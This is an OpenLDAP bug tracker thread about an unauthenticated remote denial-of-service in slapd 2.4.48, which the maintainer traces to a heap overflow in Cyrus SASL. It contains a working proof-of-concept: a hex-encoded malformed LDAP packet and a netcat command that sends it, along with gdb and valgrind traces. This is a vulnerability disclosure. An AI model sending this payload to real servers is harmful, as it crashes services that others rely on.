Issue 9123 - Unauthenticated remote denial-of-service
Summary: Unauthenticated remote denial-of-service
Status: VERIFIED WONTFIX
Alias: None
Product: OpenLDAP
Classification: Unclassified
Component: slapd (show other issues)
Version: 2.4.48
Hardware: All All
: --- normal
Target Milestone: ---
Assignee: OpenLDAP project
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2019-11-28 14:03 UTC by stephan@srlabs.de
Modified: 2020-03-14 17:06 UTC (History)
0 users

See Also:


Attachments

Note You need to log in before you can comment on or make changes to this issue.
Description stephan@srlabs.de 2019-11-28 14:03:28 UTC
Full_Name: Stephan Zeisberg
Version: 2.4.48
OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64)
URL: 
Submission from: (NULL) (78.54.65.139)


Dear openldap team �

# Issue description

Unauthenticated remote denial-of-service through malformed ldap packet

# Version

openldap-2.4.48.tgz

# How to reproduce

## Compile

$ tar xzvf openldap-2.4.48.tgz
$ cd openldap-2.4.48
$ ./configure --prefix=/tmp/openldap
$ make depend
$ make
$ make install
$ cd /tmp/openldap

## Start server

$ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091

## Create PoC crash file

$ echo -n "30840000054b020200d76084000005410201030400a38400000500a38203e2618203de308203daa003020105a1151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e766d6e6574312e766d2e626173651b1377326b332e766d6e65a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8cf3b643a2d7d3111e0aebe0eef97130b4506cbf28b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d79567bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfd0fbd3bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf00000000000000febfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821831e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ed151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e762d37343237323839373736333432303739363739766d6e6574312e766d2e62617365a382037430820370a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8c2d36313031373033343136323732353138393733b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d795679594064442bcb1ecb8639a7ef1825665683557bad4839e1a7b3cc5b76fc0ac093dcc62dd34116e7f202e38118c94c6ee468ae137aa6fce3070c081dd3941889887aac17b7b9fae6b1b432f97a905fe0765df558d738b2debc47b19b59b1c9b455cc29b88eb64620b8928714e76b310d36df7c1bfbda3fb4fbdc1fd4f34c901801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821931e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ede1"
| xxd -r -p > ldap.crash

## Execute PoC (may need to be executed multiple times)

$  nc 127.0.0.1 9091 < ldap.crash



# GDB

...
slapd: malloc.c:2379: sysmalloc: Assertion `(old_top == initial_top (av) &&
old_size == 0) || ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top)
&& ((unsigned long) old_end & (pagesize - 1)) == 0)' failed.

Thread 3 "slapd" received signal SIGABRT, Aborted.
[Switching to Thread 0x7fffb4aba700 (LWP 3684510)]
0x00007ffff5b3a625 in raise () from /lib64/libc.so.6
Missing separate debuginfos, use: dnf debuginfo-install
cyrus-sasl-gssapi-2.1.27-2.fc31.x86_64 cyrus-sasl-lib-2.1.27-2.fc31.x86_64
cyrus-sasl-plain-2.1.27-2.fc31.x86_64 keyutils-libs-1.6-3.fc31.x86_64
krb5-libs-1.17-45.fc31.x86_64 l
ibcom_err-1.45.3-1.fc31.x86_64 libdb-5.3.28-38.fc31.x86_64
libgcc-9.2.1-1.fc31.x86_64 libicu-63.2-3.fc31.x86_64
libselinux-2.9-5.fc31.x86_64 libstdc++-9.2.1-1.fc31.x86_64
libuuid-2.34-3.fc31.x86_64 nss-mdns-0.14.1-4.fc31.x86_64 open
ssl-libs-1.1.1d-2.fc31.x86_64 zlib-1.2.11-20.fc31.x86_64
(gdb) bt
#0  0x00007ffff5b3a625 in raise () from /lib64/libc.so.6
#1  0x00007ffff5b238d9 in abort () from /lib64/libc.so.6
#2  0x00007ffff5b85a7a in __malloc_assert () from /lib64/libc.so.6
#3  0x00007ffff5b882bf in sysmalloc () from /lib64/libc.so.6
#4  0x00007ffff5b89072 in _int_malloc () from /lib64/libc.so.6
#5  0x00007ffff5b8af55 in calloc () from /lib64/libc.so.6
#6  0x00007ffff5b7ced8 in open_memstream () from /lib64/libc.so.6
#7  0x00007ffff5bf99d5 in __vsyslog_internal () from /lib64/libc.so.6
#8  0x00007ffff5bf9f4a in syslog () from /lib64/libc.so.6
#9  0x00000000004ef3b4 in slap_sasl_log (context=0x7ffff54bf110,
priority=<optimized out>, 
    message=0x7fffa8103d30 "Couldn't find mech
a\202\003\336\060\202\003&#1696;\003\002\001\005\241\025\033\023W2K3.VMNET1.VM.BASE\242D0B\240\003\002\001\002\241;09\033\004ldap\033\034w9\335\063-101.w2k3.vmnet1.vm.base\033\023w2k3.vmne\240\003\002\001\027\241\003\002\001\b\242\202\003b\004\202\003^\242\065\252\353K\215\255,\301\246\177T\333\003\003R\314\064\206L\214\363\266C\242\327\323\021\036\n\353\340\356\371q0\264Pl\277(\260\034l+\264\232\355\355\t\270dN\301F&#1172;\t\327\030\070\030{\023Z\247y"...)
at sasl.c:146
#10 0x00007ffff6203344 in sasl_seterror () from /lib64/libsasl2.so.3
#11 0x00007ffff6202324 in sasl_server_start () from /lib64/libsasl2.so.3
#12 0x00000000004f1098 in slap_sasl_bind (op=<optimized out>, rs=0x7fffb4ab88b0)
at sasl.c:1524
#13 0x000000000049fd28 in fe_op_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at
bind.c:280
#14 0x000000000049f350 in do_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at
bind.c:205
#15 0x0000000000472ca8 in connection_operation (ctx=0x7fffb4ab89e8,
arg_v=0x7fffa8003120) at connection.c:1158
#16 0x0000000000471332 in connection_read_thread (ctx=0x7fffb4ab89e8,
argv=<optimized out>) at connection.c:1294
#17 0x00000000005fee7a in ldap_int_thread_pool_wrapper (xpool=0xa0b9f10) at
tpool.c:696
#18 0x00007ffff5e444e2 in start_thread () from /lib64/libpthread.so.0
#19 0x00007ffff5bff693 in clone () from /lib64/libc.so.6

Please let me know what additional information I can provide to successfully
reproduce the issue.

Note: I have also tested and reproduced the issue using the precompiled package
from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP:
slapd 2.4.47 (Jul 25 2019 00:00:00))

-Stephan Zeisberg
Comment 1 Howard Chu 2019-11-28 14:49:28 UTC
stephan@srlabs.de wrote:
> Full_Name: Stephan Zeisberg
> Version: 2.4.48
> OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64)
> URL: 
> Submission from: (NULL) (78.54.65.139)
> 
> 
> Dear openldap team —
> 
> # Issue description
> 
> Unauthenticated remote denial-of-service through malformed ldap packet
> 
> # Version
> 
> openldap-2.4.48.tgz
> 
> # How to reproduce
> 
> ## Compile
> 
> $ tar xzvf openldap-2.4.48.tgz
> $ cd openldap-2.4.48
> $ ./configure --prefix=/tmp/openldap
> $ make depend
> $ make
> $ make install
> $ cd /tmp/openldap
> 
> ## Start server
> 
> $ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091
> 
> ## Create PoC crash file
> 
> $ echo -n "30840000054b020200d76084000005410201030400a38400000500a38203e2618203de308203daa003020105a1151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e766d6e6574312e766d2e626173651b1377326b332e766d6e65a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8cf3b643a2d7d3111e0aebe0eef97130b4506cbf28b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d79567bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfd0fbd3bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfb
>  fbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf00000000000000febfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821831e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ed151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e762d373432373238393737
>  36333432303739363739766d6e6574312e766d2e62617365a382037430820370a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8c2d36313031373033343136323732353138393733b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d795679594064442bcb1ecb8639a7ef1825665683557bad4839e1a7b3cc5b76fc0ac093dcc62dd34116e7f202e38118c94c6ee468ae137aa6fce3070c081dd3941889887aac17b7b9fae6b1b432f97a905fe0765df558d738b2debc47b19b59b1c9b455cc29b88eb64620b8928714e76b310d36df7c1bfbda3fb4fbdc1fd4f34c901801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821931e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ede1"
> | xxd -r -p > ldap.crash
> 
> ## Execute PoC (may need to be executed multiple times)
> 
> $  nc 127.0.0.1 9091 < ldap.crash
> 
> 
> 
> # GDB
> 
> ...
> slapd: malloc.c:2379: sysmalloc: Assertion `(old_top == initial_top (av) &&
> old_size == 0) || ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top)
> && ((unsigned long) old_end & (pagesize - 1)) == 0)' failed.
> 
> Thread 3 "slapd" received signal SIGABRT, Aborted.
> [Switching to Thread 0x7fffb4aba700 (LWP 3684510)]
> 0x00007ffff5b3a625 in raise () from /lib64/libc.so.6
> Missing separate debuginfos, use: dnf debuginfo-install
> cyrus-sasl-gssapi-2.1.27-2.fc31.x86_64 cyrus-sasl-lib-2.1.27-2.fc31.x86_64
> cyrus-sasl-plain-2.1.27-2.fc31.x86_64 keyutils-libs-1.6-3.fc31.x86_64
> krb5-libs-1.17-45.fc31.x86_64 l
> ibcom_err-1.45.3-1.fc31.x86_64 libdb-5.3.28-38.fc31.x86_64
> libgcc-9.2.1-1.fc31.x86_64 libicu-63.2-3.fc31.x86_64
> libselinux-2.9-5.fc31.x86_64 libstdc++-9.2.1-1.fc31.x86_64
> libuuid-2.34-3.fc31.x86_64 nss-mdns-0.14.1-4.fc31.x86_64 open
> ssl-libs-1.1.1d-2.fc31.x86_64 zlib-1.2.11-20.fc31.x86_64
> (gdb) bt
> #0  0x00007ffff5b3a625 in raise () from /lib64/libc.so.6
> #1  0x00007ffff5b238d9 in abort () from /lib64/libc.so.6
> #2  0x00007ffff5b85a7a in __malloc_assert () from /lib64/libc.so.6
> #3  0x00007ffff5b882bf in sysmalloc () from /lib64/libc.so.6
> #4  0x00007ffff5b89072 in _int_malloc () from /lib64/libc.so.6
> #5  0x00007ffff5b8af55 in calloc () from /lib64/libc.so.6
> #6  0x00007ffff5b7ced8 in open_memstream () from /lib64/libc.so.6
> #7  0x00007ffff5bf99d5 in __vsyslog_internal () from /lib64/libc.so.6
> #8  0x00007ffff5bf9f4a in syslog () from /lib64/libc.so.6
> #9  0x00000000004ef3b4 in slap_sasl_log (context=0x7ffff54bf110,
> priority=<optimized out>, 
>     message=0x7fffa8103d30 "Couldn't find mech
> a\202\003\336\060\202\003&#1696;\003\002\001\005\241\025\033\023W2K3.VMNET1.VM.BASE\242D0B\240\003\002\001\002\241;09\033\004ldap\033\034w9\335\063-101.w2k3.vmnet1.vm.base\033\023w2k3.vmne\240\003\002\001\027\241\003\002\001\b\242\202\003b\004\202\003^\242\065\252\353K\215\255,\301\246\177T\333\003\003R\314\064\206L\214\363\266C\242\327\323\021\036\n\353\340\356\371q0\264Pl\277(\260\034l+\264\232\355\355\t\270dN\301F&#1172;\t\327\030\070\030{\023Z\247y"...)
> at sasl.c:146
> #10 0x00007ffff6203344 in sasl_seterror () from /lib64/libsasl2.so.3
> #11 0x00007ffff6202324 in sasl_server_start () from /lib64/libsasl2.so.3
> #12 0x00000000004f1098 in slap_sasl_bind (op=<optimized out>, rs=0x7fffb4ab88b0)
> at sasl.c:1524
> #13 0x000000000049fd28 in fe_op_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at
> bind.c:280
> #14 0x000000000049f350 in do_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at
> bind.c:205
> #15 0x0000000000472ca8 in connection_operation (ctx=0x7fffb4ab89e8,
> arg_v=0x7fffa8003120) at connection.c:1158
> #16 0x0000000000471332 in connection_read_thread (ctx=0x7fffb4ab89e8,
> argv=<optimized out>) at connection.c:1294
> #17 0x00000000005fee7a in ldap_int_thread_pool_wrapper (xpool=0xa0b9f10) at
> tpool.c:696
> #18 0x00007ffff5e444e2 in start_thread () from /lib64/libpthread.so.0
> #19 0x00007ffff5bff693 in clone () from /lib64/libc.so.6
> 
> Please let me know what additional information I can provide to successfully
> reproduce the issue.
> 
> Note: I have also tested and reproduced the issue using the precompiled package
> from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP:
> slapd 2.4.47 (Jul 25 2019 00:00:00))


Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting
this issue to them.

valgrind confirms it as well:

5ddfddde do_bind: dn () SASL mech a��0�ڠ�2K3.VMNET1.VM.BASE�D0B��;09dap9�3-101.w2k3.vmnet1.vm.base2k3.vmne���b�^�5��K��,��T�R�4�L��C���
����q0�Pl�(�l+����	�dN�FҔ	�8{Z�y�>5dz�,�

S�Q��K�ɀ�\Ѱ��7���'וg���������������������������������������������������������������������������������������������������������ӿ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
5ddfddde ==> sasl_bind: dn="" mech=a��0�ڠ�2K3.VMNET1.VM.BASE�D0B��;09dap9�3-101.w2k3.vmnet1.vm.base2k3.vmne���b�^�5��K��,��T�R�4�L��C���
����q0�Pl�(�l+����	�dN�FҔ	�8{Z�y�>5dz�,�

S�Q��K�ɀ�\Ѱ��7���'וg���������������������������������������������������������������������������������������������������������ӿ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
datalen=0
==11019== Thread 3:
==11019== Invalid write of size 1
==11019==    at 0x4B9B1DB: sasl_seterror (seterror.c:247)
==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
==11019==    by 0x21E130: fe_op_bind (bind.c:279)
==11019==    by 0x21DCE1: do_bind (bind.c:205)
==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
==11019==    by 0x4EFA322: clone (clone.S:95)
==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
==11019==    by 0x21E130: fe_op_bind (bind.c:279)
==11019==    by 0x21DCE1: do_bind (bind.c:205)
==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
==11019==
==11019== Invalid read of size 1
==11019==    at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==11019==    by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688)
==11019==    by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114)
==11019==    by 0x3A1FFA: lutil_debug (debug.c:74)
==11019==    by 0x266FF3: slap_sasl_log (sasl.c:146)
==11019==    by 0x4B9B4CF: sasl_seterror (seterror.c:260)
==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
==11019==    by 0x21E130: fe_op_bind (bind.c:279)
==11019==    by 0x21DCE1: do_bind (bind.c:205)
==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
==11019==    by 0x21E130: fe_op_bind (bind.c:279)
==11019==    by 0x21DCE1: do_bind (bind.c:205)
==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)




-- 
  -- Howard Chu
  CTO, Symas Corp.           http://www.symas.com
  Director, Highland Sun     http://highlandsun.com/hyc/
  Chief Architect, OpenLDAP  http://www.openldap.org/project/
Comment 2 Howard Chu 2019-11-28 14:54:59 UTC
Resending with the non-printable chars omitted:

Howard Chu wrote:
> Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting
> this issue to them.
> 
> valgrind confirms it as well:
> 
> 5ddfddde do_bind: dn () SASL mech <garbage>
> 5ddfddde ==> sasl_bind: dn="" mech=<garbage>
> datalen=0
> ==11019== Thread 3:
> ==11019== Invalid write of size 1
> ==11019==    at 0x4B9B1DB: sasl_seterror (seterror.c:247)
> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
> ==11019==    by 0x4EFA322: clone (clone.S:95)
> ==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
> ==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
> ==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
> ==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
> ==11019==
> ==11019== Invalid read of size 1
> ==11019==    at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==11019==    by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688)
> ==11019==    by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114)
> ==11019==    by 0x3A1FFA: lutil_debug (debug.c:74)
> ==11019==    by 0x266FF3: slap_sasl_log (sasl.c:146)
> ==11019==    by 0x4B9B4CF: sasl_seterror (seterror.c:260)
> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
> ==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
> ==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
> ==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
> 
> 
> 
> 


-- 
  -- Howard Chu
  CTO, Symas Corp.           http://www.symas.com
  Director, Highland Sun     http://highlandsun.com/hyc/
  Chief Architect, OpenLDAP  http://www.openldap.org/project/

Comment 3 stephan@srlabs.de 2019-11-28 14:57:30 UTC
Hi Howard —

Thanks for the quick reply. Will forward the report upstream to Cyrus SASL.

Best

    -Stephan

On 11/28/19 3:54 PM, Howard Chu wrote:
> Resending with the non-printable chars omitted:
>
> Howard Chu wrote:
>> Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting
>> this issue to them.
>>
>> valgrind confirms it as well:
>>
>> 5ddfddde do_bind: dn () SASL mech <garbage>
>> 5ddfddde ==> sasl_bind: dn="" mech=<garbage>
>> datalen=0
>> ==11019== Thread 3:
>> ==11019== Invalid write of size 1
>> ==11019==    at 0x4B9B1DB: sasl_seterror (seterror.c:247)
>> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
>> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
>> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
>> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
>> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
>> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
>> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
>> ==11019==    by 0x4EFA322: clone (clone.S:95)
>> ==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
>> ==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
>> ==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
>> ==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
>> ==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
>> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
>> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
>> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
>> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
>> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
>> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
>> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
>> ==11019==
>> ==11019== Invalid read of size 1
>> ==11019==    at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
>> ==11019==    by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688)
>> ==11019==    by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114)
>> ==11019==    by 0x3A1FFA: lutil_debug (debug.c:74)
